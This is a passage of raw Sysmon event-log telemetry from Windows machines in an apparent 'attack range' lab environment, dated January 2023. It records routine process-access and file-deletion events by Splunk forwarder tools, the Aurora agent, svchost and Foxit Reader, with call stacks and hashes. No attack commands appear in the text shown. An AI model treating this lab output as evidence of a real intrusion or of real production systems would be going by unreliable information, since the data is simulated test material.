Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E44A-63C7-FE01-00000000B002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016347Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E44A-63C7-FE01-00000000B002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016346Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016345Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016344Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016343Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016342Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016341Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016340Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016339Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016338Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016337Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E44A-63C7-FE01-00000000B002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016336Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.416{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E44A-63C7-FE01-00000000B002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016335Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.417{E5A8D418-E44A-63C7-FE01-00000000B002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016334Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.182{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=663D009919B1129831F047DA14297F37,SHA256=810AE4E36490A2B15C482485D618E7ED43F8EF3FAC9F3D6EF375AC5ACCC94F64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016333Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.104{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=854D8288E87DC1AC66634468666FA3A1,SHA256=A1F48802B548DF911B7AAEB4E479357F3830DAED2913EF3A7B7E1B28BFB62BBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.950{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=D2E415FD8E2376F0DBFD4EF29221370B,SHA256=EB07E9F519003DE0991D2793C0962C6C22437CB4AD1EF5A491FC3652A44A96CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.949{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_FwjQW8CAodl4ynwMD5=C104A596D91ED4DFEA59A35EB0010844,SHA256=6378CAAEA3E7BE3E23574637FD3AB47AA5322B357A842416892F3B87DA2C1C1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.938{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=491B069B4A1DC84F94F66F2AD213334F,SHA256=AB78DF0D605BAB6FF79899912CE7CBE69AA8A69FE27198007A384F6FAA9336F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.854{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.848{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000016369Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.812{E5A8D418-E44B-63C7-FF01-00000000B002}36641232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016368Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E44B-63C7-FF01-00000000B002}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016367Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016366Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016365Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016364Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016363Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\W